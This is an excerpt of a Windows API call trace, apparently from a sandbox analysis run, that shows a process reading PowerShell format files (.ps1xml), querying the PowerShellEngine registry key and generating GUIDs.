	[0765.553] ReadFile (in: hFile=0x318, lpBuffer=0x3340ee0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x3340ee0*, lpNumberOfBytesRead=0x1cd458*=0xbce, lpOverlapped=0x0) returned 1
	[0765.553] ReadFile (in: hFile=0x318, lpBuffer=0x3340616, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x3340616*, lpNumberOfBytesRead=0x1cd458*=0x0, lpOverlapped=0x0) returned 1
	[0765.553] ReadFile (in: hFile=0x318, lpBuffer=0x3340ee0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x3340ee0*, lpNumberOfBytesRead=0x1cd458*=0x0, lpOverlapped=0x0) returned 1
	[0765.553] CloseHandle (hObject=0x318) returned 1
	[0765.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0765.554] SetErrorMode (uMode=0x1) returned 0x1
	[0765.554] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd400 | out: lpFileInformation=0x1cd400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0765.554] SetErrorMode (uMode=0x1) returned 0x1
	[0765.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0765.554] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd4e8 | out: phkResult=0x1cd4e8*=0x318) returned 0x0
	[0765.554] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd46c, lpData=0x0, lpcbData=0x1cd468*=0x0 | out: lpType=0x1cd46c*=0x1, lpData=0x0, lpcbData=0x1cd468*=0x56) returned 0x0
	[0765.555] CoTaskMemAlloc (cb=0x5a) returned 0x288e990
	[0765.555] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd43c, lpData=0x288e990, lpcbData=0x1cd438*=0x56 | out: lpType=0x1cd43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd438*=0x56) returned 0x0
	[0765.555] CoTaskMemFree (pv=0x288e990) 
	[0765.555] RegCloseKey (hKey=0x318) returned 0x0
	[0765.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0765.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0765.556] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x819dea6c, Data2=0x921a, Data3=0x4f46, Data4=([0]=0xaf, [1]=0xbc, [2]=0x80, [3]=0xce, [4]=0x80, [5]=0x70, [6]=0x89, [7]=0xce))) returned 0x0
	[0765.557] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xf07086fc, Data2=0xb506, Data3=0x4b98, Data4=([0]=0x82, [1]=0xb7, [2]=0x4a, [3]=0x18, [4]=0x81, [5]=0x4, [6]=0x6e, [7]=0x2c))) returned 0x0
	[0765.557] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xb203a7f9, Data2=0x4058, Data3=0x4455, Data4=([0]=0xba, [1]=0x2c, [2]=0xdf, [3]=0x89, [4]=0x54, [5]=0x4b, [6]=0x0, [7]=0x1))) returned 0x0
	[0765.557] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x5c38eda3, Data2=0x852b, Data3=0x4c73, Data4=([0]=0xbf, [1]=0xfb, [2]=0xa2, [3]=0xd4, [4]=0x4e, [5]=0x39, [6]=0xb, [7]=0x70))) returned 0x0
	[0765.557] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xbd04a789, Data2=0x28b3, Data3=0x4e9d, Data4=([0]=0xa4, [1]=0x12, [2]=0xd3, [3]=0xdd, [4]=0x3f, [5]=0x4f, [6]=0x32, [7]=0x5e))) returned 0x0
	[0765.557] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xb613facb, Data2=0xe272, Data3=0x43c3, Data4=([0]=0x92, [1]=0x27, [2]=0x4, [3]=0x3e, [4]=0x7f, [5]=0x1a, [6]=0xa5, [7]=0xc7))) returned 0x0
	[0767.814] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x450b541e, Data2=0x8ad, Data3=0x4a03, Data4=([0]=0x9f, [1]=0xc, [2]=0x46, [3]=0x3b, [4]=0x39, [5]=0xf0, [6]=0x18, [7]=0x4f))) returned 0x0
	[0767.814] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x3a415ce6, Data2=0x71e9, Data3=0x410f, Data4=([0]=0x9e, [1]=0xc, [2]=0x5b, [3]=0xff, [4]=0x2, [5]=0x3e, [6]=0x44, [7]=0x10))) returned 0x0
	[0767.814] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x49e7e09, Data2=0xbe90, Data3=0x40a6, Data4=([0]=0x88, [1]=0x66, [2]=0x91, [3]=0x39, [4]=0xf5, [5]=0x7b, [6]=0x2a, [7]=0x81))) returned 0x0
	[0767.815] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x82c3fa85, Data2=0xbdd1, Data3=0x41ae, Data4=([0]=0xbb, [1]=0xb7, [2]=0x5, [3]=0xd3, [4]=0x76, [5]=0xee, [6]=0x11, [7]=0x39))) returned 0x0
	[0767.815] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xe443b864, Data2=0x2183, Data3=0x451a, Data4=([0]=0x9c, [1]=0xda, [2]=0x76, [3]=0x91, [4]=0x0, [5]=0x8b, [6]=0x96, [7]=0x70))) returned 0x0
	[0767.815] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x837616ee, Data2=0x5abc, Data3=0x4ba2, Data4=([0]=0xac, [1]=0x23, [2]=0x4b, [3]=0x63, [4]=0xf3, [5]=0xd7, [6]=0x24, [7]=0xd7))) returned 0x0
	[0767.815] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x5e9d2170, Data2=0x3c80, Data3=0x4fe5, Data4=([0]=0x92, [1]=0x8e, [2]=0x43, [3]=0xb2, [4]=0x47, [5]=0x33, [6]=0xd7, [7]=0x26))) returned 0x0
	[0767.816] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x774088f4, Data2=0xaf3f, Data3=0x43ce, Data4=([0]=0xa0, [1]=0xe8, [2]=0xf1, [3]=0xc0, [4]=0x18, [5]=0xa2, [6]=0x74, [7]=0xc))) returned 0x0
	[0767.816] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x33216fee, Data2=0x4715, Data3=0x4ef3, Data4=([0]=0xa4, [1]=0x59, [2]=0x2b, [3]=0xff, [4]=0x3e, [5]=0x98, [6]=0xf7, [7]=0xa5))) returned 0x0
	[0767.816] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x688a03a3, Data2=0x128, Data3=0x4861, Data4=([0]=0xa3, [1]=0x41, [2]=0xa9, [3]=0xf2, [4]=0xdc, [5]=0x7a, [6]=0x47, [7]=0x7b))) returned 0x0
	[0767.816] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x8b99b162, Data2=0xf6b2, Data3=0x49a6, Data4=([0]=0xab, [1]=0x84, [2]=0x66, [3]=0xe8, [4]=0x18, [5]=0xb6, [6]=0xfa, [7]=0x51))) returned 0x0
	[0767.816] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x52b5c157, Data2=0xb086, Data3=0x447b, Data4=([0]=0xb0, [1]=0x86, [2]=0x8b, [3]=0x6e, [4]=0x2a, [5]=0xe7, [6]=0x6e, [7]=0x3e))) returned 0x0
	[0767.816] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x4a47fae5, Data2=0xf79e, Data3=0x4604, Data4=([0]=0x93, [1]=0x58, [2]=0x73, [3]=0xd8, [4]=0x7d, [5]=0xe8, [6]=0x38, [7]=0x31))) returned 0x0
	[0767.816] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x1dc21628, Data2=0xf84f, Data3=0x451e, Data4=([0]=0xb6, [1]=0xa, [2]=0x2f, [3]=0x16, [4]=0x95, [5]=0xa1, [6]=0x27, [7]=0xc))) returned 0x0
	[0767.817] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x24c67792, Data2=0x807e, Data3=0x4541, Data4=([0]=0xaf, [1]=0xcb, [2]=0xdb, [3]=0x46, [4]=0xdd, [5]=0xe2, [6]=0x8b, [7]=0x4c))) returned 0x0
	[0767.817] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xcac69bda, Data2=0x3505, Data3=0x46ce, Data4=([0]=0x9d, [1]=0x64, [2]=0x2e, [3]=0x21, [4]=0x2f, [5]=0x21, [6]=0xf1, [7]=0xbd))) returned 0x0
	[0767.817] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x8e17a4af, Data2=0x7e0b, Data3=0x45d5, Data4=([0]=0xa9, [1]=0xde, [2]=0xa5, [3]=0x9, [4]=0xa3, [5]=0xb6, [6]=0x63, [7]=0xae))) returned 0x0
	[0767.817] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x14946730, Data2=0x5885, Data3=0x42cf, Data4=([0]=0xaa, [1]=0x20, [2]=0x43, [3]=0xef, [4]=0xb0, [5]=0x71, [6]=0x48, [7]=0xf8))) returned 0x0
	[0767.818] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xcfebb67d, Data2=0xc3c2, Data3=0x41d3, Data4=([0]=0xa2, [1]=0x26, [2]=0x2b, [3]=0x3a, [4]=0x20, [5]=0x79, [6]=0xa0, [7]=0x36))) returned 0x0
	[0767.818] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x4d0957d6, Data2=0xc989, Data3=0x4b58, Data4=([0]=0xb3, [1]=0xd2, [2]=0xaf, [3]=0xc1, [4]=0x3e, [5]=0xe1, [6]=0x1b, [7]=0xc1))) returned 0x0
	[0767.818] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x9801fac5, Data2=0xada9, Data3=0x49b3, Data4=([0]=0xb6, [1]=0x46, [2]=0x60, [3]=0x18, [4]=0x41, [5]=0xce, [6]=0x6f, [7]=0xda))) returned 0x0
	[0767.819] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x756546c8, Data2=0xfac2, Data3=0x4872, Data4=([0]=0xbd, [1]=0xf6, [2]=0x12, [3]=0x22, [4]=0x21, [5]=0x54, [6]=0xe9, [7]=0xf3))) returned 0x0
	[0767.819] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x6a37b9eb, Data2=0xb01e, Data3=0x4c4b, Data4=([0]=0xb1, [1]=0x20, [2]=0xf7, [3]=0xf1, [4]=0xdf, [5]=0x96, [6]=0xee, [7]=0x2b))) returned 0x0
	[0767.819] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x667cba3d, Data2=0x7906, Data3=0x4012, Data4=([0]=0x83, [1]=0x6, [2]=0x64, [3]=0xaf, [4]=0xa8, [5]=0x32, [6]=0x8d, [7]=0x67))) returned 0x0
	[0767.819] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x441a21f0, Data2=0xb60b, Data3=0x4608, Data4=([0]=0xbb, [1]=0xe4, [2]=0x65, [3]=0x3b, [4]=0xa5, [5]=0xb2, [6]=0x7, [7]=0x50))) returned 0x0
	[0767.820] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xbf9cb07a, Data2=0xb931, Data3=0x4a51, Data4=([0]=0xb0, [1]=0x9f, [2]=0xac, [3]=0x4a, [4]=0x3d, [5]=0xd2, [6]=0xd9, [7]=0xc4))) returned 0x0
	[0767.820] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x90bc8ddf, Data2=0xa91c, Data3=0x4989, Data4=([0]=0x89, [1]=0x4, [2]=0x3f, [3]=0x24, [4]=0xc3, [5]=0x74, [6]=0xf2, [7]=0x10))) returned 0x0
	[0767.820] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x294fe9d1, Data2=0x2317, Data3=0x4bb0, Data4=([0]=0xa1, [1]=0x12, [2]=0xd1, [3]=0xd3, [4]=0x82, [5]=0xf0, [6]=0x98, [7]=0xaf))) returned 0x0
	[0767.820] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xedd0ad76, Data2=0x9348, Data3=0x4abd, Data4=([0]=0x83, [1]=0x76, [2]=0x7b, [3]=0x78, [4]=0x5b, [5]=0x31, [6]=0x6, [7]=0xee))) returned 0x0
	[0767.821] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x821692e7, Data2=0xf8cc, Data3=0x4b41, Data4=([0]=0x80, [1]=0x67, [2]=0xfa, [3]=0x3c, [4]=0x24, [5]=0xce, [6]=0xb6, [7]=0x64))) returned 0x0
	[0767.825] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x713fef24, Data2=0x622c, Data3=0x43de, Data4=([0]=0xa1, [1]=0xe4, [2]=0x99, [3]=0x47, [4]=0xf8, [5]=0x99, [6]=0xbf, [7]=0x25))) returned 0x0
	[0767.825] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318
	[0767.826] GetFileType (hFile=0x318) returned 0x1
	[0767.826] SetErrorMode (uMode=0x1) returned 0x1
	[0767.826] GetFileType (hFile=0x318) returned 0x1
	[0767.826] ReadFile (in: hFile=0x318, lpBuffer=0x34516e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x34516e8*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0767.828] ReadFile (in: hFile=0x318, lpBuffer=0x34516e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x34516e8*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0767.829] ReadFile (in: hFile=0x318, lpBuffer=0x34516e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x34516e8*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0767.829] ReadFile (in: hFile=0x318, lpBuffer=0x34516e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x34516e8*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0767.832] ReadFile (in: hFile=0x318, lpBuffer=0x34516e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x34516e8*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0767.832] ReadFile (in: hFile=0x318, lpBuffer=0x34516e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x34516e8*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0767.833] ReadFile (in: hFile=0x318, lpBuffer=0x34516e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x34516e8*, lpNumberOfBytesRead=0x1cd458*=0x119, lpOverlapped=0x0) returned 1
	[0767.833] ReadFile (in: hFile=0x318, lpBuffer=0x34516e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x34516e8*, lpNumberOfBytesRead=0x1cd458*=0x0, lpOverlapped=0x0) returned 1
	[0767.833] CloseHandle (hObject=0x318) returned 1
	[0767.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0767.833] SetErrorMode (uMode=0x1) returned 0x1
	[0767.833] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd400 | out: lpFileInformation=0x1cd400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0767.833] SetErrorMode (uMode=0x1) returned 0x1
	[0767.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0767.834] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd4e8 | out: phkResult=0x1cd4e8*=0x318) returned 0x0
	[0767.834] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd46c, lpData=0x0, lpcbData=0x1cd468*=0x0 | out: lpType=0x1cd46c*=0x1, lpData=0x0, lpcbData=0x1cd468*=0x56) returned 0x0
	[0767.834] CoTaskMemAlloc (cb=0x5a) returned 0x288e990
	[0767.834] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd43c, lpData=0x288e990, lpcbData=0x1cd438*=0x56 | out: lpType=0x1cd43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd438*=0x56) returned 0x0
	[0767.834] CoTaskMemFree (pv=0x288e990) 
	[0767.834] RegCloseKey (hKey=0x318) returned 0x0
	[0767.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0767.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0767.847] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xfa145c2c, Data2=0x2052, Data3=0x478c, Data4=([0]=0xb5, [1]=0xb8, [2]=0x81, [3]=0xca, [4]=0xff, [5]=0xc2, [6]=0x55, [7]=0xe5))) returned 0x0
	[0767.847] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xfcbc946, Data2=0x9adf, Data3=0x4507, Data4=([0]=0x92, [1]=0xb5, [2]=0x15, [3]=0x2c, [4]=0xf7, [5]=0xcd, [6]=0x95, [7]=0xc7))) returned 0x0
	[0767.847] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x62461801, Data2=0xd359, Data3=0x48f3, Data4=([0]=0xb1, [1]=0x86, [2]=0xe5, [3]=0xac, [4]=0x87, [5]=0x9f, [6]=0x3a, [7]=0xf0))) returned 0x0
	[0767.847] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x25914ecb, Data2=0x62ac, Data3=0x4d53, Data4=([0]=0xbc, [1]=0x77, [2]=0x7e, [3]=0xce, [4]=0x72, [5]=0x64, [6]=0xf6, [7]=0x94))) returned 0x0
	[0767.848] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318
	[0767.848] GetFileType (hFile=0x318) returned 0x1
	[0767.848] SetErrorMode (uMode=0x1) returned 0x1
	[0767.848] GetFileType (hFile=0x318) returned 0x1
	[0767.848] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0767.849] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0767.849] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0767.849] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0767.850] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0767.850] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0767.850] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0767.850] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.121] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.122] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.122] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.123] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.123] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.123] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.124] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.124] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.127] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.128] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0769.128] ReadFile (in: hFile=0x318, lpBuffer=0x32ef5d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x32ef5d0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
